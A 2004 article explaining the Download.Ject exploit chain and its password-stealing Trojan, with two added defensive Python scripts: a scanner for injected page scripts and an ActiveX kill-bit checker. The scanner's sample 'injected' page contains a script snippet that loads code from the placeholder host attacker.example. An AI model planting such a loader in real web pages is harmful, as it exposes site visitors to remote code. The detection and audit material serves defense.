Exploit Targeted Online Commerce, Banking
Jul. 19, 2004

On June 24, 2004, Microsoft published information about an exploit called Download.Ject (also known as Scob, Toofer, and Webber.P) that attempts to install a "Trojan horse" program on users' PCs. This Trojan can later be used to steal users' passwords for e-commerce, Web-based e-mail, and online banking sites.

Download.Ject does not attempt to replicate itself, and is therefore not a virus or worm, making it different from other highly publicized exploits such as SQL Slammer (which infected SQL Server in Feb. 2003) or Code Red (which infected IIS in July 2001). However, while these past exploits were annoying—Slammer, for instance, created massive amounts of IP traffic as it replicated itself, slowing the Internet and corporate networks to a crawl—most did not attempt to destroy, steal, or significantly alter users' data.

A quick response from antivirus companies and authorities seems to have limited the damage from Download.Ject. Nonetheless, because it was so sophisticated, exploiting three separate Microsoft technologies, and because of its seeming criminal intent, enterprises and end users should be aware of what happened and how to reduce the likelihood of damage from similar attacks in the future.

Three Attack Vectors

According to Microsoft and security researchers that publicized the exploit, Download.Ject used three attack vectors—two known vulnerabilities for which Microsoft had issued patches and by-design functionality in an ActiveX control.

First, the attackers exploited a vulnerability in IIS 5.0, the Web server that shipped with Windows 2000 Server, to insert JavaScript onto Web pages. Although Microsoft had issued a patch for this IIS vulnerability in Apr. 2004 (covered in Microsoft Security Bulletin MS04-011), some Web sites had not yet installed the patch—a problem also seen in past exploits. Only Kelley Blue Book, a car-pricing site, publicly acknowledged the infection, although security researchers suggested that some other sites were affected. But because Microsoft and security researchers did not publicize possible infections, mainly out of concern for Web sites' privacy and business, users had no way of knowing whether sites they normally considered trustworthy had in fact been compromised.

When a user visited an infected Web page, the JavaScript instructed the user's PC to download and install a program from a server located in Russia. According to security researchers LURHQ, this program (a variant of a previously seen Trojan known as Berbew, Webber, or Padador) collects users' passwords when they log into the auction site eBay, the payment site PayPal (used by eBay), and Web-based e-mail accounts from EarthLink, Juno, and Yahoo, and periodically transmits these passwords to the attackers. In addition, when users visit certain (unrevealed) credit card or online banking sites, the Trojan creates false pop-up windows that ask for users' PIN numbers or credit card numbers—the windows appear to be legitimate, but are actually redirecting users to a site administered by the attacker.

As IE was designed, scripts (including JScript and VBScript) are supposed to run only within the browser window and should not be able to take control of a user's PC in this fashion—that is, to download and execute a program without the user's consent. But Download.Ject took advantage of a vulnerability in Outlook Express (which, like IE, ships with every copy of Windows) and by-design functionality in an ActiveX control known as ADODB.Stream to give this JScript code access to other PC functions.

At the time of the attack, Microsoft had released a patch for the Outlook Express vulnerability (MS04-013). However, even though security researchers warned as early as July 2003 that ADODB.Stream could be misused, Microsoft did not immediately address the problem for fear that it would break existing Web applications.
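Because the first link in the chain was script inserted into pages served by a compromised IIS host, the check a Webmaster most wants is whether the pages the server is actually sending contain script the site never published. The Python script below is an added example, not code from the original article or from Microsoft: it parses a served page, collects every host that script is loaded from (either a `script src` attribute or an absolute URL inside an inline script), flags any host outside an operator-maintained allowlist, and flags script blocks that appear after the closing `</html>` tag, which is where server-side footer injection tends to land. The two sample pages, the allowlist, and the host names are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect script references from a page: external src hosts, inline
    script bodies, and a count of <script> tags appearing after </html>."""

    def __init__(self):
        super().__init__()
        self.external_hosts = []   # hosts named in <script src="...">
        self.inline_scripts = []   # bodies of inline <script> blocks
        self.trailing_scripts = 0  # <script> tags seen after </html>
        self._html_closed = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        if self._html_closed:
            self.trailing_scripts += 1
        src = dict(attrs).get("src")
        if src:
            # Relative paths have no hostname and are treated as the site's own.
            self.external_hosts.append((urlparse(src).hostname or "").lower())
        else:
            self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self.inline_scripts.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif tag == "html":
            self._html_closed = True


# Absolute URLs embedded in inline script (e.g. a dynamically added script src).
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def scan_page(html, allowed_hosts):
    """Return a list of findings for one served page.

    allowed_hosts: hosts the site legitimately loads script from (assumption:
    the site operator maintains this allowlist). Relative paths are trusted.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()

    hosts = set(parser.external_hosts)
    for body in parser.inline_scripts:
        hosts.update(h.lower() for h in URL_RE.findall(body))

    findings = []
    for host in sorted(hosts):
        if host and host not in allowed_hosts:
            findings.append(f"script references unexpected host: {host}")
    if parser.trailing_scripts:
        findings.append(
            f"{parser.trailing_scripts} script block(s) appended after </html>")
    return findings


# Constructed sample pages (not real site content).
CLEAN_PAGE = """<html><head>
<script src="https://www.example.com/js/site.js"></script>
</head><body><p>Used car prices</p></body></html>
"""

# The same page with a script block appended after the closing tag that pulls
# further script from an outside host; the host name is a placeholder.
INJECTED_PAGE = CLEAN_PAGE + """<script>
var s = document.createElement("script");
s.src = "http://attacker.example/loader.js";
document.body.appendChild(s);
</script>
"""

ALLOWED = {"www.example.com"}

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_page(page, ALLOWED) or ["no findings"])
```

Run against pages fetched from the production server rather than the files on disk: the point of the check is to compare what is actually served with what was published, so a footer added by the server itself is caught.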

Response Quick, But Problems Remain

Shortly after Download.Ject was widely publicized on June 24, several antivirus vendors updated their virus-detection programs and posted instructions for Webmasters and end users to detect and repair compromised machines, and Microsoft posted a security bulletin about the exploit. By the next day, the Russian Web server that was the source of the Trojan had been disabled.

On July 2, Microsoft released a configuration update for Windows 2000 (Server and Professional), Windows XP, and Windows Server 2003 via Windows Update that disabled ADODB.Stream's ability to write to the OS, thereby fixing the remaining vulnerability. (Microsoft does not call this a patch because it disables by-design functionality rather than fixing an acknowledged bug or flaw.)
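An administrator verifying that this configuration change is actually in place on a machine can check whether Internet Explorer's ActiveX "kill bit" has been set for the ADODB.Stream control, which is how the update disables it. The Python script below is an added example, not Microsoft's tooling or code from the article; the registry key path, the kill-bit flag value (0x400) and the ADODB.Stream CLSID are well-known Windows values supplied here as assumptions, since the article does not state them. The registry read only works on Windows; elsewhere the script reports the control as not blocked.

```python
import sys

# Bit that Internet Explorer treats as the ActiveX "kill bit" in a control's
# Compatibility Flags value (well-known Windows value, stated here as an
# assumption rather than taken from the article).
KILL_BIT = 0x00000400

# Registry location IE consults for per-control compatibility flags (assumed).
COMPAT_KEY = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"

# CLSID of the ADODB.Stream control (assumed well-known value; not on the page).
ADODB_STREAM_CLSID = "{00000566-0000-0010-8000-00AA006D2EA4}"


def kill_bit_set(compat_flags):
    """True if compat_flags (an int DWORD, or None when the value is absent)
    has the kill bit set, i.e. IE will refuse to instantiate the control."""
    if compat_flags is None:
        return False
    return bool(compat_flags & KILL_BIT)


def read_compat_flags(clsid):
    """Read the Compatibility Flags DWORD for clsid from HKLM, or None if the
    key or value does not exist. Only meaningful on Windows; returns None
    elsewhere so the rest of the script still runs for demonstration."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows-only standard-library module
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            COMPAT_KEY + "\\" + clsid) as key:
            value, kind = winreg.QueryValueEx(key, "Compatibility Flags")
    except OSError:
        return None
    return value if kind == winreg.REG_DWORD else None


def audit_controls(clsids):
    """Map each CLSID to whether its kill bit is set on this machine."""
    return {clsid: kill_bit_set(read_compat_flags(clsid)) for clsid in clsids}


if __name__ == "__main__":
    for clsid, blocked in audit_controls([ADODB_STREAM_CLSID]).items():
        print(clsid, "kill bit set" if blocked else "NOT blocked")
```

The same function can be pointed at any other control's CLSID, which matters given the article's closing observation that a further control (Shell.Application) was shown to be abusable days later; an audit list of CLSIDs is easier to keep current than a one-off check.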

Although installing all the applicable patches and configuration changes would have prevented Download.Ject from causing harm, they do not address the core problem: by enabling IE to support interactive applications through technologies such as scripting, ActiveX, and Dynamic HTML (DHTML), and integrating IE with Windows, Microsoft has increased the exposure of Windows to malicious executable code delivered over the Internet from unknown sources. Indeed, several days after Microsoft released the ADODB.Stream configuration change, security researchers showed how a similar exploit could take advantage of another ActiveX control, Shell.Application.
